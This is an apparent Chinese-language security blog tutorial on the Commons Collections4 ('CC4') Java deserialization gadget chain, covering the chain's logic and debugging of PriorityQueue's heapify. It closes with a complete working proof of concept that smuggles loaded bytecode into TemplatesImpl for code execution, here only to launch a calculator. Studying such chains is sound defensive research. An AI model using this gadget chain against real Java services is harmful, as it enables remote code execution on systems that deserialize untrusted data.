0x00 前言

读者能看到这里,想必对Java反序列化cc链有一定熟悉了。本文不再以寻找的视角学习cc4链,侧重于宏观分析和调试思路。

0x01 概述

背景

cc4链使用的是commons-collections4库,先载入:

1
2
3
4
5
<dependency>
    <groupId>org.apache.commons</groupId>
    <artifactId>commons-collections4</artifactId>
    <version>4.0</version>
</dependency>

commons-collections4库4.0之后的版本,InvokerTransformer不再继承Serializable接口,所以本文还是使用静态代码执行危险函数,采用的类是InstantiateTransformer。

思路

cc链围绕着transform方法展开

cc4链子底部依然采用ChainedTransformer.transform方法,只需往上找即可。

0x02 poc

先给出链子底部poc:

image-20241213154915977

再给出链子顶部:

image-20241213160856825

先给出初步的完整poc:

image-20241213161307023

这个poc是不行的。如果读者是一层层写poc的话,不难发现问题出在PriorityQueue类,那便在readObject的heapify方法打个断点,调试寻找原因。

原来是调用到heapify方法时,成员参数size为0,(0 >>> 1) - 1 == -1,所以不妨另size为2看看。

既然要修改属性的值,既可以常规方法修改也可以反射修改。add还是会弹calc,采用反射,给出最终poc:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
package cc4;

import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import org.apache.commons.collections4.Transformer;
import org.apache.commons.collections4.comparators.TransformingComparator;
import org.apache.commons.collections4.functors.ChainedTransformer;
import org.apache.commons.collections4.functors.ConstantTransformer;
import org.apache.commons.collections4.functors.InstantiateTransformer;

import javax.xml.transform.Templates;
import java.lang.reflect.Field;
import java.nio.file.Files;
import java.nio.file.Paths;
import java.util.PriorityQueue;

import static Tool.Serialize.serialize;
import static Tool.Unserialize.unserialize;

public class Main {
    public static void main(String[] args) throws Exception{
        TemplatesImpl templates = new TemplatesImpl();
        Class templatesClass = templates.getClass();
        Field nameField = templatesClass.getDeclaredField("_name");
        nameField.setAccessible(true);
        nameField.set(templates, "example_name");
        Field bytecodesField = templatesClass.getDeclaredField("_bytecodes");
        bytecodesField.setAccessible(true);
        byte[] code = Files.readAllBytes(Paths.get("E://all_test/test_java/com/Unserialize/cc_test/target/classes/Tool/Calc.class"));
        byte[][] codes = {code};
        bytecodesField.set(templates, codes);
        Field tfactoryField = templatesClass.getDeclaredField("_tfactory");
        tfactoryField.setAccessible(true);
        tfactoryField.set(templates, new TransformerFactoryImpl());
        InstantiateTransformer instantiateTransformer = new InstantiateTransformer(new Class[]{Templates.class}, new Object[]{templates});
        Transformer[]  transformers = new Transformer[]{
                new ConstantTransformer(TrAXFilter.class),
                instantiateTransformer
        };
        ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
        ChainedTransformer chainedTransformer1 = new ChainedTransformer(new Transformer[]{});

        TransformingComparator transformingComparator = new TransformingComparator(chainedTransformer1);
        PriorityQueue<Object> priorityQueue = new PriorityQueue<>(transformingComparator);
        priorityQueue.add(1);
        priorityQueue.add(2);
        Class transformersClass = transformingComparator.getClass();
        Field transformerField = transformersClass.getDeclaredField("transformer");
        transformerField.setAccessible(true);
        transformerField.set(transformingComparator, chainedTransformer);
        serialize(priorityQueue);
        unserialize("ser.bin");
    }
}

0x03 结语

温故而知新。